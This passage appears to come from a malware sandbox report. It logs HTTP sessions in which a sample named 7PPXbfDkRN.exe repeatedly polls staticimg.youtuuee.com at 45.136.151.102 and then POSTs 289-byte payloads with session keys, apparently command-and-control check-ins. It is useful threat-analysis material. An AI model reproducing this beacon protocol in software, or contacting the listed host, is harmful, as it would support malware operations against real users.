1398 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 35 34 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 55 65 36 68 70 67 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150543,"time":1635061600,"rand_str":"Ue6hpg"}0
Oct 24, 2021 09:46:41.125655890 CEST
1398 OUT POST /api/?sid=2150543&key=dc8b6a39192685a24adf63edb72eaa2f HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:41.280822039 CEST
1399 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
22 192.168.2.5 49776 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:42.144409895 CEST
1400 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:42.296432018 CEST
1400 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 35 39 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 68 45 47 57 48 4e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150597,"time":1635061602,"rand_str":"hEGWHN"}0
Oct 24, 2021 09:46:42.505656004 CEST
1401 OUT POST /api/?sid=2150597&key=f556d9b1b3eb13930c8eb84fd2c75d69 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:42.660232067 CEST
1401 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
23 192.168.2.5 49777 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:43.287152052 CEST
1402 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:43.442729950 CEST
1402 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 36 34 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 34 42 52 48 64 69 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150643,"time":1635061603,"rand_str":"4BRHdi"}0
Oct 24, 2021 09:46:43.451596975 CEST
1403 OUT POST /api/?sid=2150643&key=00bda22e431ce351ebc677dc0b52b42e HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:43.604079962 CEST
1404 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
24 192.168.2.5 49778 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:43.910032988 CEST
1404 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:44.059397936 CEST
1405 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 36 37 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 50 79 37 55 41 32 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150673,"time":1635061603,"rand_str":"Py7UA2"}0
Oct 24, 2021 09:46:44.071578026 CEST
1405 OUT POST /api/?sid=2150673&key=240dac36d4da93b289eb9fc9b1dbf3cf HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:44.230175018 CEST
1406 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
25 192.168.2.5 49779 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:44.549891949 CEST
1407 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:44.695611954 CEST
1407 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 37 30 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 34 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 59 42 65 45 33 49 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150707,"time":1635061604,"rand_str":"YBeE3I"}0
Oct 24, 2021 09:46:44.707463980 CEST
1407 OUT POST /api/?sid=2150707&key=ddacdc5d5fb6e792522698a758a1431a HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:44.859213114 CEST
1408 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
26 192.168.2.5 49780 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:45.172622919 CEST
1409 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:45.318222046 CEST
1409 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 37 33 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 78 6b 67 64 69 70 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150735,"time":1635061605,"rand_str":"xkgdip"}0
Oct 24, 2021 09:46:45.329612017 CEST
1410 OUT POST /api/?sid=2150735&key=141effec60248e2d310c38549aec1135 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:45.483130932 CEST
1410 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
27 192.168.2.5 49781 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:45.814385891 CEST
1411 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:45.966428995 CEST
1412 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 37 36 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 36 79 32 74 5a 65 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150763,"time":1635061605,"rand_str":"6y2tZe"}0
Oct 24, 2021 09:46:45.979497910 CEST
1412 OUT POST /api/?sid=2150763&key=48ddd1efffb3f391c22b544a783191cf HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:46.131217003 CEST
1413 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
28 192.168.2.5 49782 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:46.451883078 CEST
1414 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:46.599595070 CEST
1414 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 37 39 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 42 58 65 64 37 72 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150799,"time":1635061606,"rand_str":"BXed7r"}0
Oct 24, 2021 09:46:46.608633041 CEST
1414 OUT POST /api/?sid=2150799&key=5bcf6127fb480887256a415fe5d0b555 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:46.761059046 CEST
1415 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
29 192.168.2.5 49783 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:47.079695940 CEST
1416 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:47.225680113 CEST
1416 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 38 33 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 4b 70 68 55 71 4d 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150837,"time":1635061607,"rand_str":"KphUqM"}0
Oct 24, 2021 09:46:47.235615015 CEST
1417 OUT POST /api/?sid=2150837&key=d83b5cee705da3d2c3bd196ed9680364 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:47.394483089 CEST
1417 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
3 192.168.2.5 49751 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:15.055269003 CEST
1325 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:15.203010082 CEST
1325 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 33 31 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 4d 4a 77 39 36 5a 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149311,"time":1635061575,"rand_str":"MJw96Z"}0
Oct 24, 2021 09:46:15.348901987 CEST
1325 OUT POST /api/?sid=2149311&key=51597f4ebba3856d49b8f376ed79ffcd HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:15.500364065 CEST
1326 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
30 192.168.2.5 49784 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:47.728708982 CEST
1418 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:47.883045912 CEST
1419 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 38 36 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 46 68 61 6e 45 43 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150867,"time":1635061607,"rand_str":"FhanEC"}0
Oct 24, 2021 09:46:47.894747019 CEST
1419 OUT POST /api/?sid=2150867&key=063d31afe0e24621c7d74dbaf75408d0 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:48.056725025 CEST
1420 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
31 192.168.2.5 49785 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:48.383100033 CEST
1420 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:48.527046919 CEST
1421 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 39 30 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 38 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 6b 55 76 64 65 78 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150907,"time":1635061608,"rand_str":"kUvdex"}0
Oct 24, 2021 09:46:48.538640976 CEST
1421 OUT POST /api/?sid=2150907&key=021ad353d9168c6646a91ee81aef17bd HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:48.688570976 CEST
1422 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
32 192.168.2.5 49786 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:49.005182028 CEST
1423 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:49.163343906 CEST
1423 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 39 33 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 39 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 45 4a 48 53 54 54 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150939,"time":1635061609,"rand_str":"EJHSTT"}0
Oct 24, 2021 09:46:49.172435045 CEST
1424 OUT POST /api/?sid=2150939&key=ed9790a22aadd1de955b18ce8e9931a9 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:49.329922915 CEST
1424 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
33 192.168.2.5 49787 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:49.640058994 CEST
1425 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:49.786853075 CEST
1425 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 39 37 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 39 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 7a 36 46 33 32 38 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150977,"time":1635061609,"rand_str":"z6F328"}0
Oct 24, 2021 09:46:49.794687033 CEST
1426 OUT POST /api/?sid=2150977&key=4ee7a2d959cb4a10f673c7d88974a245 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:49.950081110 CEST
1426 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
34 192.168.2.5 49788 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:50.273909092 CEST
1427 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:50.421237946 CEST
1428 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 30 31 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 4a 55 78 34 46 37 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151013,"time":1635061610,"rand_str":"JUx4F7"}0
Oct 24, 2021 09:46:50.438482046 CEST
